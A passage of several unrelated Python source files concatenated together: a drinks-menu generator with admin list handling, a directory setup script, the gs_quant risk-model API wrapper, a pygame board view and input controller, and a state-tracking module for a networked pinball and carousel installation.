def __init__(self, menu):
"""
This menu file must fit the specified format
:param menu: string
"""
self.menu = menu
def options_provider(self):
"""
This options provider gives you a tuples of options.
If you answer it with one of the options by `send` method,
it will provide another tuples of options to you until raise a StopIteration.
:return: generator
"""
with open(os.path.join(self.__class__._dir_path, self.menu), 'r') as drinks_file:
drinks_title, drinks_list = json.load(drinks_file)
must_choose_title = drinks_title.pop()
for title in drinks_title:
chosen_one = yield title, tuple(drinks_list.keys())
drinks_list = drinks_list[chosen_one]
for must_choose_attribute in drinks_list.items():
yield '{}: {}'.format(must_choose_title, must_choose_attribute[0]), tuple(must_choose_attribute[1])
class Admin:
_dir_path = os.path.join(os.path.dirname(__file__), '../../files/admin/')
def __init__(self, admin):
self.admin = admin
def add(self, uid):
with open(os.path.join(self.__class__._dir_path, self.admin), 'a') as admin_file:
admin_file.write(f'\n{uid}')
def list(self):
"""
:return: a list of admin
"""
with open(os.path.join(self.__class__._dir_path, self.admin)) as admin_file:
return [admin.strip() for admin in admin_file]
def is_admin(self, uid):
return str(uid) in self.list()
|
import os
touching_dir='labeled_data/touching/'
not_touching_dir='labeled_data/not_touching/'
raw_data_dir='raw_data'
pos_frames_dir='pos_frames'
for i in touching_dir,not_touching_dir,raw_data_dir,pos_frames_dir:
if not os.path.exists(i):
os.makedirs(i)
|
"""
Copyright 2019 Goldman Sachs.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
import datetime as dt
from typing import List, Dict
from gs_quant.api.gs.risk_models import GsRiskModelApi
from gs_quant.target.risk_models import RiskModelData, RiskModelCalendar, RiskModelFactor, \
DataAssetsRequest, Measure, Format
class RiskModel:
def __init__(self, model_id: str):
self.model = GsRiskModelApi.get_risk_model(model_id)
def get_dates(self, start_date: dt.date = None, end_date: dt.date = None) -> List:
""" Retrieve risk model dates for existing risk model """
return GsRiskModelApi.get_risk_model_dates(self.model.id, start_date, end_date)
def get_factor(self, factor_id: str) -> RiskModelFactor:
""" Retrieve risk model factor from model and factor ids """
return GsRiskModelApi.get_risk_model_factor(self.model.id, factor_id)
def create_factor(self, factor: RiskModelFactor):
""" Create a new risk model factor """
GsRiskModelApi.create_risk_model_factor(self.model.id, factor)
def update_factor(self, factor_id: str, factor: RiskModelFactor):
""" Update existing risk model factor """
GsRiskModelApi.update_risk_model_factor(self.model.id, factor_id, factor)
def delete_factor(self, factor_id: str):
""" Delete a risk model factor """
GsRiskModelApi.delete_risk_model_factor(self.model.id, factor_id)
def get_factor_data(self,
start_date: dt.date = None,
end_date: dt.date = None,
identifiers: List[str] = None,
include_performance_curve: bool = None) -> List[Dict]:
""" Retrieve factor data for existing risk model """
return GsRiskModelApi.get_risk_model_factor_data(self.model.id,
start_date,
end_date,
identifiers,
include_performance_curve)
def get_calendar(self) -> RiskModelCalendar:
""" Retrieve risk model calendar for existing risk model """
return GsRiskModelApi.get_risk_model_calendar(self.model.id)
def upload_calendar(self, calendar: RiskModelCalendar):
""" Upload risk model calendar to existing risk model """
return GsRiskModelApi.upload_risk_model_calendar(self.model.id, calendar)
def get_asset_universe(self,
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve asset universe data for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
[Measure.Asset_Universe],
limit_factors, data_format)
def get_historical_beta(self,
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve historical beta data for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
[Measure.Historical_Beta],
limit_factors,
data_format)
def get_total_risk(self,
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve total risk data for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
[Measure.Total_Risk],
limit_factors,
data_format)
def get_specific_risk(self,
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve specific risk data for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
[Measure.Specific_Risk],
limit_factors,
data_format)
def get_residual_variance(self,
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve residual variance data for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
[Measure.Residual_Variance],
limit_factors,
data_format)
def get_universe_factor_exposure(self,
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve universe factor exposure data for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
[Measure.Universe_Factor_Exposure],
limit_factors,
data_format)
def get_factor_returns(self,
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve factor return data for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
[Measure.Factor_Return],
limit_factors,
data_format)
def get_covariance_matrix(self,
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve covariance matrix data for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
[Measure.Covariance_Matrix],
limit_factors,
data_format)
def get_issuer_specific_covariance(self,
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve issuer specific covariance data for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
[Measure.Issuer_Specific_Covariance],
limit_factors,
data_format)
def get_factor_portfolios(self,
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve factor portfolios data for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
[Measure.Factor_Portfolios],
limit_factors,
data_format)
def get_data(self,
measures: List[Measure],
start_date: dt.date,
end_date: dt.date,
assets: DataAssetsRequest = None,
limit_factors: bool = None,
data_format: Format = None) -> Dict:
""" Retrieve data for multiple measures for existing risk model """
return GsRiskModelApi.get_risk_model_data(self.model.id,
start_date,
end_date,
assets,
measures,
limit_factors,
data_format)
def upload_data(self, data: RiskModelData):
""" Upload risk model data to existing risk model """
GsRiskModelApi.upload_risk_model_data(self.model.id, data)
|
import pygame, draw
DEFAULTVIEWDIMS = (0, 0, 500, 500)
MINZOOM = 200
EDGEPIXELRANGE = 20
DEFAULTZOOM = 1.1
class ZoomError(StandardError):
pass
class StateError(StandardError):
pass
class gameViewControl:
"""This class controls the game view"""
def __init__(self, display, board, bgLayers):
self._display = display
self._board = board
self._bgLayers = bgLayers
self._boardViewRect = pygame.Rect(display.get_rect())
self._curZoom = 1
def update(self, t, *args, **kwargs):
board = self._board
## self._bgLayers.update(t)
## self._bgLayers.draw(self._display)
board.update(t, *args, **kwargs)
bRect = board.get_boardRect() ##this will be a pygame.Rect
vRect = self._boardViewRect ##this will be a pygame.Rect
boardSurface = pygame.Surface(bRect.size)
boardSurface.blit(self._bgLayers, (0, 0))
board.draw(boardSurface)
try:
boardView = boardSurface.subsurface(vRect)
except ValueError:
while(not boardSurface.get_rect().contains(vRect)):
vRect.inflate_ip(-1,-1)
self._boardViewRect = vRect
boardView = boardSurface.subsurface(vRect.clip(bRect))
pygame.transform.smoothscale(boardView,\
self._display.get_size(),\
self._display)
def zoom(self, zoomBy):
"""Zooms the view in or out.
zoomBy is the fractional difference in the view window
after the zoom. e.g.: zoomBy<0 is a zoom in, while
zoomBy>0 is a zoom out."""
if zoomBy<=0:
raise ZoomError("zoomBy must be greater than 0")
zoomBy = zoomBy - 1
orig_bVRect = pygame.Rect(self._boardViewRect)
size = (self._boardViewRect[2]*zoomBy,\
self._boardViewRect[3]*zoomBy)
bRect = self._board.get_boardRect()
self._boardViewRect.inflate_ip(*size)
self._boardViewRect.clamp_ip(bRect)
if not bRect.contains(self._boardViewRect):
self._boardViewRect = orig_bVRect
elif not all(i>MINZOOM for i in self._boardViewRect.size):
self._boardViewRect = orig_bVRect
else:
self._curZoom += self._curZoom*zoomBy
def move(self, x, y):
bRect = self._board.get_boardRect()
self._boardViewRect.move_ip(x*self._curZoom,\
y*self._curZoom)
self._boardViewRect.clamp_ip(bRect)
class inputControl:
"""This class controls input through an interpreter.
This is the bare bones base class."""
def __init__(self, **kwargs):
self.attributes = kwargs
def changePlayer(self, newPlayer):
self._player = newPlayer
def changeboard(self, newboard):
self._board = newboard
def changeViewControl(self, newViewControl):
self._viewControl = newViewControl
def onMousePress(self, mouseButton):
print "you pressed mouse", mouseButton
return
def onClick(self, mouseButton):
print "you clicked", mouseButton
return
def onDoubleClick(self):
print "double click!"
return
def onMouseOnEdge(self, edgeSections):
print "mouse is on edges", edgeSections
return
def onScroll(self, upOrDown):
"""up == 1, down == 0"""
if upOrDown == 1:
print "scroll up"
if upOrDown == 0:
print "scroll down"
return
def onDrag(self, mouseMotionEvent):
print "you dragged", mouseMotionEvent.rel,\
mouseMotionEvent.pos
return
def onKeyPress(self, key):
print "you pressed the key", key
return
def onKeyHold(self, key):
print "you are holding the key", key
return
def onStartDragging(self, mouseButton):
print "you started dragging with mouse", mouseButton
def onStopDragging(self, mouseButton):
print "you stopped dragging with mouse", mouseButton
## def onKeyHoldToDrag(self, keyPressed):
## return
class makeType_gIC(inputControl):
"""This is an abstract class for
state wrappers for gameInputControl."""
def __init__(self, gameInputControl, **newAttributes):
self.attributes = gameInputControl.attributes
for key in newAttributes.iterkeys():
self.attributes[key] = newAttributes[key]
self._linkAttributes()
def _linkAttributes(self):
return
class makeBoard_gIC(makeType_gIC):
"""Wrapper for inputControl.
This makes the current gameInputControl
into a controller for the Board.
Implements gameInputControl. """
def _linkAttributes(self):
self._player = self.attributes["player"]
self._board = self.attributes["board"]
self._viewControl = self.attributes["viewControl"]
def onMousePress(self, mouseButton):
print "you pressed mouse", mouseButton
return
def onClick(self, mouseButton):
print "you clicked", mouseButton
return
def onDoubleClick(self):
print "double click!"
return
def onMouseOnEdge(self, edgeSections):
print "mouse is on edges", edgeSections
return
def onScroll(self, upOrDown):
"""up == 1, down == 0"""
if upOrDown == 1:
self._viewControl.zoom(DEFAULTZOOM**-1)
if upOrDown == 0:
self._viewControl.zoom(DEFAULTZOOM)
return
def onDrag(self, mouseMotionEvent):
self._viewControl.move(-mouseMotionEvent.rel[0],\
-mouseMotionEvent.rel[1])
return
def onKeyPress(self, key):
print "you pressed the key", key
return
def onKeyHold(self, key):
print "you are holding the key", key
return
def onStartDragging(self, mouseButton):
print "you started dragging with mouse", mouseButton
def onStopDragging(self, mouseButton):
print "you stopped dragging with mouse", mouseButton
class inputInterpreter:
"""This class interprets input"""
def __init__(self, state="board", doubleClickDelay=250, holdDelay = 150,\
**kwargs):
self._gIC = inputControl(**kwargs)
self.changeState(state)
self._dCdelay = doubleClickDelay
self._holdDelay = holdDelay
self._lastMouseHoldTime = 0
self._lastKeyHoldTime = 0
self._mousePressed = None
## self._mousePressedLastFrame = False
self._mouseHeldInDelay = False
self._LMouseUpInDelay = False
## self._keyPressed = None
self._dragging = False
self._holding = False
self._doubleClicked = False
self._lastDoubleClick = 0
self._DCBlock = False
def changeState(self, newState):
if newState == "board":
self._gIC = makeBoard_gIC(self._gIC)
else:
raise StateError("There is no state " + str(newState))
def updateInput(self, t):
events = pygame.event.get()
pygame.event.clear()
if self._mouseHeldInDelay == True\
and (t - self._lastMouseHoldTime\
>=self._holdDelay)\
and not self._dragging:
self._gIC.onStartDragging(self._mousePressed)
self._dragging = True
if (t - self._lastDoubleClick\
>= self._dCdelay) and self._DCBlock:
self._DCBlock = False
self._doubleClicked = False
for ev in events:
if pygame.MOUSEBUTTONDOWN\
== ev.type:
if ev.button == 4:
self._gIC.onScroll(1)
break
if ev.button == 5:
self._gIC.onScroll(0)
break
self._mousePressed = ev.button
## self._mousePressedLastFrame = True
if self._LMouseUpInDelay and\
(t - self._lastMouseHoldTime\
<self._dCdelay):
if not self._DCBlock:
self._doubleClicked = True
self._LMouseUpInDelay = False
else:
self._LMouseUpInDelay = False
self._gIC.onMousePress(self._mousePressed)
self._mouseHeldInDelay = True
self._holding = True
self._lastMouseHoldTime = t
if pygame.MOUSEBUTTONUP\
== ev.type:
if self._doubleClicked and not self._DCBlock:
self._gIC.onDoubleClick()
self._doubleClicked = False
self._lastDoubleClick = t
self._DCBlock = True
elif not self._doubleClicked and\
not self._dragging:
self._gIC.onClick(ev.button)
elif self._dragging:
self._gIC.onStopDragging(ev.button)
if self._mouseHeldInDelay and\
ev.button == 1:
if t - self._lastMouseHoldTime\
<self._dCdelay:
self._LMouseUpInDelay = True
self._mouseHeldInDelay = False
self._dragging = False
self._holding = False
if pygame.KEYDOWN\
== ev.type:
self._lastKeyHoldTime = t
## self._keyPressed = ev.key
self._gIC.onKeyHold(ev.key)
if pygame.KEYUP\
== ev.type:
self._gIC.onKeyPress(ev.key)
if pygame.MOUSEMOTION\
== ev.type:
if self._dragging:
self._gIC.onDrag(ev)
elif self._holding:
self._gIC.onStartDragging(self._mousePressed)
self._dragging = True
onEdges = self.get_mouseOnEdges()
if onEdges != []:
self._gIC.onMouseOnEdge(onEdges)
def get_mouseOnEdges(self):
return []
class gameInputInterpreter(inputInterpreter):
"""This class interprets game input."""
def __init__(self, player, board, viewControl,\
state="board", doubleClickDelay=250, holdDelay = 150):
inputInterpreter.__init__(self, state, doubleClickDelay, holdDelay,\
player= player, board =board,\
viewControl= viewControl)
|
"""
host module functions:
cache the varied state data of hosts, providing continuity when mode changes
provide method names for publishing to thirtybirds topics
provide state data to http_server
data flow:
controller writes state data here
current mode reads and requests state data here
http_server reads and requests state data here
verbs:
request - send request to host for data
set - store response to request, called by controller.main()
get - return locally stored data
cmd - send command that returns nothing
to do:
ensure thread safety
what happens when controller writes to self.foo while mode and http_server read self.foo?
safety could come from the fact that these are only used main.run and never simultaneously
add vars and methods to store system tests
"""
import codecs
import os
import queue
import sys
import threading
import time
app_path = os.path.dirname((os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
sys.path.append(os.path.split(app_path)[0])
from thirtybirds3 import thirtybirds
from thirtybirds3.adapters.sensors.ina260 import ina260
class Host():
def __init__(self, hostname):
self.hostname = hostname
self.connected = False
self.ready = False
self.last_deadman = 0 #unix timestamp
self.queue = queue.Queue
self.df = -1
self.cpu_temp = -1
self.pinball_git_timestamp = ""
self.tb_git_timestamp = ""
self.response_current_sensor_present = -1
self.response_current_sensor_value = -1
self.response_current_sensor_nominal = -1
def set_connected(self, connected):
self.connected = connected
def get_connected(self):
return self.connected
def set_ready(self, ready):
self.ready = ready
def get_ready(self, ready):
return self.ready
def set_last_deadman(self, last_deadman):
self.last_deadman = last_deadman
def get_last_deadman(self, last_deadman):
return self.last_deadman
def set_computer_details(self,computer_details):
self.df = computer_details["df"]
self.cpu_temp = computer_details["cpu_temp"]
self.pinball_git_timestamp = computer_details["pinball_git_timestamp"]
self.tb_git_timestamp = computer_details["tb_git_timestamp"]
def get_computer_details(self):
return {
"df":self.df,
"cpu_temp":self.cpu_temp,
"pinball_git_timestamp":self.pinball_git_timestamp,
"tb_git_timestamp":self.tb_git_timestamp,
}
def get_computer_details_received(self):
if self.df == -1:
return False
if self.cpu_temp == -1:
return False
if self.pinball_git_timestamp == "":
return False
if self.tb_git_timestamp == "":
return False
return True
def get_df(self):
return self.df
def get_cpu_temp(self):
return self.cpu_temp
def get_pinball_git_timestamp(self):
return self.pinball_git_timestamp
def get_tb_git_timestamp(self):
return self.tb_git_timestamp
def set_current_sensor_present(self,response_current_sensor_present):
self.response_current_sensor_present = response_current_sensor_present
def set_current_sensor_value(self,response_current_sensor_value):
self.response_current_sensor_value = response_current_sensor_value
def set_current_sensor_nominal(self,response_current_sensor_nominal):
self.response_current_sensor_nominal = response_current_sensor_nominal
def get_current_sensor_present(self):
return self.response_current_sensor_present
def get_current_sensor_value(self):
return self.response_current_sensor_value
def get_current_sensor_nominal(self):
return self.response_current_sensor_nominal
class Controller(Host):
def __init__(self, hostname, tb):
Host.__init__(self, hostname)
self.hostname = hostname
self.safety_enable = False
self.tb = tb
def get_safety_enable(self):
return self.safety_enable
def set_safety_enable(self,safety_enable):
self.safety_enable = safety_enable
def get_computer_details(self):
return {
"df":self.tb.get_system_disk(),
"cpu_temp":self.tb.get_core_temp(),
"pinball_git_timestamp":self.tb.app_get_git_timestamp(),
"tb_git_timestamp":self.tb.tb_get_git_timestamp(),
}
class Carousel(Host):
def __init__(self, hostname, tb):
Host.__init__(self, hostname)
self.hostname = hostname
self.tb = tb
self.carousel_error = {}
self.solenoids_present = [
False,
False,
False,
False,
False
]
self.balls_present = [
False,
False,
False,
False,
False
]
def request_solenoids_present(self):
self.tb.publish(topic="request_solenoids_present",message=True,destination=self.hostname)
def set_solenoids_present(self, solenoids_present):
self.solenoids_present = solenoids_present
def get_solenoids_present(self):
return self.solenoids_present
def set_carousel_ball_detected(self, balls_present):
self.balls_present = balls_present
def get_carousel_ball_detected(self):
return self.balls_present
def request_eject_ball(self, fruit_name):
self.tb.publish(topic="cmd_carousel_eject_ball",message=fruit_name,destination=self.hostname)
def request_system_tests(self):
self.tb.publish(topic="request_system_tests",message=True,destination=self.hostname)
def cmd_carousel_lights(self, group, animation):
self.tb.publish(
topic="cmd_carousel_lights",
message=[group, animation],
destination=self.hostname
)
def cmd_carousel_all_off(self):
self.tb.publish(
topic="cmd_carousel_all_off",
message=True,
destination=self.hostname
)
def set_carousel_error(self,carousel_error):
self.carousel_error = carousel_error
def get_carousel_error(self,carousel_error):
return self.carousel_error
class Matrix(Host):
def __init__(self, hostname, tb):
Host.__init__(self, hostname)
self.hostname = hostname
self.tb = tb
self.sdc2160_present = {
"carousel1and2":False,
"carousel3and4":False,
"carousel5and6":False,
}
self.carousel_names = [
"carousel1",
"carousel2",
"carousel3",
"carousel4",
"carousel5",
"carouselcenter",
]
self.sdc2160_controller_faults = [
None,None,None,
]
self.sdc2160_channel_faults = [
None,
None,
None,
None,
None,
None,
]
self.amt203_present = [
False,
False,
False,
False,
False,
False,
]
self.amt203_zeroed = [
False,
False,
False,
False,
False,
False,
]
self.amt203_absolute_position = [
None,
None,
None,
None,
None,
None,
]
self.sdc2160_relative_position = [
None,
None,
None,
None,
None,
None,
]
self.sdc2160_closed_loop_error = [
None,
None,
None,
None,
None,
None,
]
self.motors = [
{
"current":0,
"temp":0,
"pid_error":0,
"status":0,
"target":0,
"discrepancy":0,
"target_reached":[False,0],
"stalled":[False,0],
"timeout":[False,0],
},
{
"current":0,
"temp":0,
"pid_error":0,
"status":0,
"target":0,
"discrepancy":0,
"target_reached":[False,0],
"stalled":[False,0],
"timeout":[False,0],
},
{
"current":0,
"temp":0,
"pid_error":0,
"status":0,
"target":0,
"discrepancy":0,
"target_reached":[False,0],
"stalled":[False,0],
"timeout":[False,0],
},
{
"current":0,
"temp":0,
"pid_error":0,
"status":0,
"target":0,
"discrepancy":0,
"target_reached":[False,0],
"stalled":[False,0],
"timeout":[False,0],
},
{
"current":0,
"temp":0,
"pid_error":0,
"status":0,
"target":0,
"discrepancy":0,
"target_reached":[False,0],
"stalled":[False,0],
"timeout":[False,0],
},
{
"current":0,
"temp":0,
"pid_error":0,
"status":0,
"target":0,
"discrepancy":0,
"target_reached":[False,0],
"stalled":[False,0],
"timeout":[False,0],
},
]
self.motor_by_carousel_name = {
"carousel_1":self.motors[0],
"carousel_2":self.motors[0],
"carousel_3":self.motors[0],
"carousel_4":self.motors[0],
"carousel_5":self.motors[0],
"carousel_center":self.motors[0],
}
self.target_position = [
0,0,0,0,0,0
]
self.target_position_confirmed = [
False,
False,
False,
False,
False,
False,
]
self.named_positions = {
"center_front":0,
"center_back":0,
"trueque_tube":0,
"dinero_tube":0,
"exchange_left_prep":0,
"exchange_right_prep":0,
}
self.fruit_positions = [0,0,0,0,0,0]
def cmd_rotate_carousel_to_target(self, carousel_name, fruit_name, position_name):
self.tb.publish(topic="cmd_rotate_carousel_to_target", message=[carousel_name, fruit_name, position_name])
def get_amt203_absolute_position(self, fruit_id):
return self.amt203_absolute_position[fruit_id]
def get_amt203_absolute_position_populated(self):
if None in self.amt203_absolute_position:
return False
return True
def get_amt203_present(self):
return all(self.amt203_present)
def get_amt203_zeroed(self):
return False not in self.amt203_zeroed
def get_destination_reached(self, motor_name):
motor = self.motor_by_carousel_name[motor_name]
return motor["target_reached"]
def get_destination_stalled(self, motor_name):
motor = self.motor_by_carousel_name[motor_name]
return motor["stalled"]
def get_destination_timeout(self, motor_name):
motor = self.motor_by_carousel_name[motor_name]
return motor["timeout"]
def get_motor_details(self, property, fruit_id):
return self.motors[fruit_id][property]
def get_sdc2160_channel_faults(self):
return self.sdc2160_channel_faults
def get_sdc2160_closed_loop_error(self):
return self.sdc2160_closed_loop_error
def get_sdc2160_controller_faults(self):
return self.sdc2160_controller_faults
def get_sdc2160_faults(self):
return self.sdc2160_faults
def get_sdc2160_present(self):
return all(self.sdc2160_present.values())
def get_sdc2160_relative_position(self, fruit_id=-1):
if fruit_id == -1:
return self.sdc2160_relative_position
else:
return self.sdc2160_relative_position[fruit_id]
def get_target_position_confirmed(self):
return self.target_position_confirmed
def request_amt203_absolute_position(self, fruit_id):
self.tb.publish(topic="request_amt203_absolute_position", message="")
def request_amt203_present(self):
self.tb.publish(topic="request_amt203_present", message="")
def request_amt203_zeroed(self): # this is a command, not a query
self.tb.publish(topic="request_amt203_zeroed", message="")
def request_motor_details(self, property, fruit_id):
self.tb.publish(topic="request_motor_details", message=[property, fruit_id])
def request_sdc2160_channel_faults(self):
self.tb.publish(topic="request_sdc2160_channel_faults", message="")
def request_sdc2160_closed_loop_error(self):
self.tb.publish(topic="request_sdc2160_closed_loop_error", message="")
def request_sdc2160_controller_faults(self):
self.tb.publish(topic="request_sdc2160_controller_faults", message="")
def request_sdc2160_faults(self):
self.tb.publish(topic="request_sdc2160_faults", message="")
def request_sdc2160_present(self):
self.tb.publish(topic="request_sdc2160_present", message="")
def request_sdc2160_relative_position(self, fruit_id):
self.tb.publish(topic="request_sdc2160_relative_position", message="")
def request_target_position_confirmed(self):
self.tb.publish(topic="request_target_position_confirmed", message="")
def response_high_power_disabled(self):
self.tb.publish(topic="response_high_power_enabled", message=False)
def response_high_power_enabled(self):
self.tb.publish(topic="response_high_power_enabled", message=True)
def sdc2160_channel_faults_populated(self):
if None in self.sdc2160_channel_faults:
return False
return True
def sdc2160_closed_loop_error_populated(self):
if None in self.sdc2160_closed_loop_error:
return False
return True
def sdc2160_controller_faults_populated(self):
if None in self.sdc2160_controller_faults:
return False
return True
def sdc2160_relative_position_populated(self):
if None in self.sdc2160_relative_position:
return False
return True
def set_amt203_absolute_position(self, absolute_position, fruit_id=-1):
if fruit_id == -1 or fruit_id == None:
self.amt203_absolute_position = absolute_position
else:
self.amt203_absolute_position[fruit_id] = absolute_position
def set_amt203_present(self,amt203_present):
self.amt203_present = amt203_present
def set_amt203_zeroed(self,amt203_zeroed):
self.amt203_zeroed = amt203_zeroed
def set_destination_reached(self, motor_name, reached, position, position_error):
motor = self.motor_by_carousel_name[motor_name]
motor["target"] = position + position_error
motor["discrepancy"] = position_error
motor["target_reached"] = [reached, time.time()]
def set_destination_stalled(self, motor_name, stalled, position, position_error):
motor = self.motor_by_carousel_name[motor_name]
motor["target"] = position + position_error
motor["discrepancy"] = position_error
motor["stalled"] = [stalled, time.time()]
def set_destination_timeout(self, motor_name, timeout, position, position_error):
motor = self.motor_by_carousel_name[motor_name]
motor["target"] = position + position_error
motor["discrepancy"] = position_error
motor["timeout"] = [timeout, time.time()]
def set_motor_details(self, property, fruit_id, value):
self.motors[fruit_id][property] = value
def set_sdc2160_channel_faults(self,sdc2160_channel_faults):
self.sdc2160_channel_faults = sdc2160_channel_faults
def set_sdc2160_closed_loop_error(self,sdc2160_closed_loop_error):
self.sdc2160_closed_loop_error = sdc2160_closed_loop_error
def set_sdc2160_controller_faults(self,sdc2160_controller_faults):
self.sdc2160_controller_faults = sdc2160_controller_faults
def set_sdc2160_faults(self,sdc2160_present):
self.sdc2160_faults = sdc2160_faults
def set_sdc2160_present(self,presence):
self.sdc2160_present = presence
def set_sdc2160_relative_position(self, relative_position, fruit_id = -1):
print("set_sdc2160_relative_position",relative_position, fruit_id)
if fruit_id == -1:
self.sdc2160_relative_position = relative_position
else:
self.sdc2160_relative_position[fruit_id] = relative_position
def set_target_position_confirmed(self,fruit_id,state_bool):
self.target_position_confirmed[fruit_id] = state_bool
class Pinball(Host):
def __init__(self, hostname, tb):
Host.__init__(self, hostname)
self._48v_current = -1
self.barter_points = -1
self.current_sensor_present= False
self.gameplay_enabled = False
self.gutter_ball_detected = False
self.left_stack_inventory = -1
self.money_points = -1
self.right_stack_inventory = -1
self.roll_inner_left = False
self.roll_inner_right = False
self.roll_outer_left = False
self.roll_outer_right = False
self.tb = tb
self.troughsensor_value = False
self.barter_mode_score = 0
self.money_mode_score = 0
self.playfield_switch_active = {
"trough_sensor":False,
"roll_outer_left":False,
"roll_inner_left":False,
"roll_outer_right":False,
"roll_inner_right":False,
}
self.button_light_active = {
"izquierda":False,
"trueque":False,
"comienza":False,
"dinero":False,
"derecha":False,
}
self.button_switch_active = {
"izquierda":False,
"trueque":False,
"comienza":False,
"dinero":False,
"derecha":False,
}
#is this list useful here?
self.playfield_animations = {
"trail_rollover_right":None,
"trail_rollover_left":None,
"trail_sling_right":None,
"trail_sling_left":None,
"trail_pop_left":None,
"trail_pop_right":None,
"trail_pop_middle":None,
"trail_spinner":None,
"pie_rollover_right":None,
"pie_rollover_left":None,
"pie_sling_right":None,
"pie_sling_left":None,
"pie_pop_left":None,
"pie_pop_right":None,
"pie_pop_middle":None,
"pie_spinner":None,
"sign_arrow_left":None,
"sign_bottom_right":None,
"sign_top":None,
}
def enable_gameplay(self):
self.gameplay_enabled = True
self.tb.publish(topic="enable_gameplay", message="",destination=self.hostname)
def disable_gameplay(self):
self.gameplay_enabled = False
self.tb.publish(topic="disable_gameplay", message="",destination=self.hostname)
def enable_trueque_coil(self, enable_bool, miliseconds=20):
# no current need to store state locally
self.tb.publish(topic="cmd_enable_trueque_coil", message=[enable_bool,miliseconds],destination=self.hostname)
def enable_dinero_coil(self, enable_bool, miliseconds=20):
# no current need to store state locally
self.tb.publish(topic="cmd_enable_dinero_coil", message=[enable_bool,miliseconds],destination=self.hostname)
def enable_kicker_coil(self, enable_bool, miliseconds=20):
# no current need to store state locally
self.tb.publish(topic="cmd_enable_kicker_coil", message=[enable_bool,miliseconds],destination=self.hostname)
def enable_izquierda_coil(self, enable_bool, miliseconds=20):
# no current need to store state locally
self.tb.publish(topic="cmd_enable_izquierda_coil", message=[enable_bool,miliseconds],destination=self.hostname)
def enable_derecha_coil(self, enable_bool, miliseconds=20):
# no current need to store state locally
self.tb.publish(topic="cmd_enable_derecha_coil", message=[enable_bool,miliseconds],destination=self.hostname)
### LEFT TUBE ###
def request_lefttube_present(self):
self.tb.publish(topic="request_lefttube_present", message="",destination=self.hostname)
def set_lefttube_present(self,lefttube_present):
self.lefttube_present = lefttube_present
def get_lefttube_present(self):
return self.lefttube_present
def set_lefttube_value(self,lefttube_value):
self.lefttube_value = lefttube_value
def get_lefttube_value(self):
return self.lefttube_value
def cmd_lefttube_launch(self):
self.tb.publish(
topic="cmd_lefttube_launch",
message=True,
destination=self.hostname
)
def set_left_stack_inventory(self,left_stack_inventory):
self.left_stack_inventory = left_stack_inventory
def get_left_stack_inventory(self):
return self.left_stack_inventory
def set_barter_points(self,barter_points):
self.barter_points = barter_points
def get_barter_points(self):
return self.barter_points
def request_money_points(self):
self.tb.publish(
topic="request_money_points",
message="",
destination=self.hostname
)
### RIGHT TUBE ###
def request_righttube_present(self):
self.tb.publish(topic="request_righttube_present", message="",destination=self.hostname)
def set_righttube_present(self,righttube_present):
self.righttube_present = righttube_present
def get_righttube_present(self):
return self.righttube_present
def set_righttube_value(self,righttube_value):
self.righttube_value = righttube_value
def get_righttube_value(self):
return self.righttube_value
def cmd_righttube_launch(self):
self.tb.publish(
topic="cmd_righttube_launch",
message=True,
destination=self.hostname
)
def set_right_stack_inventory(self,right_stack_inventory):
self.right_stack_inventory = right_stack_inventory
def get_right_stack_inventory(self):
return self.right_stack_inventory
def set_money_points(self,money_points):
self.money_points = money_points
def request_troughsensor_value(self):
self.tb.publish(topic="request_troughsensor_value", message="",destination=self.hostname)
def set_troughsensor_value(self,troughsensor_value):
self.troughsensor_value = troughsensor_value
def get_troughsensor_value(self):
return self.troughsensor_value
def cmd_kicker_launch(self):
self.tb.publish(
topic="cmd_kicker_launch",
message=True,
destination=self.hostname
)
def set_roll_outer_left(self,roll_outer_left):
self.roll_outer_left = roll_outer_left
def set_roll_outer_right(self,roll_outer_right):
self.roll_outer_right = roll_outer_right
def set_roll_inner_right(self,roll_inner_right):
self.roll_inner_right = roll_inner_right
def set_roll_inner_left(self,roll_inner_left):
